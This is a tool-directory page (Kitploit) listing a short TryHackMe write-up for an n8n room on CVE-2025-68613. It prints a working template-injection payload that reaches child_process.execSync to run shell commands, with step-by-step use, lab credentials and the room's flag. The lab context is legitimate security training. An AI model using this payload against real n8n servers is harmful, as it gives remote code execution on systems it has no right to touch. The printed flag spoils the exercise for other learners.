Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
n8n-CVE-2025-68613-TryHackMe — The minor methodology for room: https://tryhackme.com/room/n8ncve202568613 | Kitploit
Tools/GitHubGitHub/j4ck3lsyn-gen2/n8n-cve-2025-68613-tryhackme
Vulnerability AnalysisExploitationWeb Application ExploitationCTFLearning & EducationLabs & Practice
GitHubj4ck3lsyn-gen2/n8n-cve-2025-68613-tryhackme

n8n-CVE-2025-68613-TryHackMe

The minor methodology for room: https://tryhackme.com/room/n8ncve202568613

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
7 months agoNot yet reviewed

TryHackMe Room: n8n: CVE-2025-68613

Player: J4ck3LSyN

Your Image Badge

Host: ...

Username: [email protected]

Password: Try12345!

Methodology

Payload: {{ (function(){ return this.process.mainModule.require('child_process').execSync('cat flag.txt').toString() })() }} Payload 2: {{ (function(){ return this.process.mainModule.require('child_process').execSync('cat flag.txt').toString() })() }}

  1. Access the attack box.
  2. Start New
  3. Add First Step, let the right side bar open and add Manual Trigger.
  4. After add a Set Fields option.
  5. Add a field name pwn and the payload.
  6. Execute & pwn.
  7. Change the payload to exec cat flag.txt - Flag: THM{n8n_exposed_workflow}
Download Tool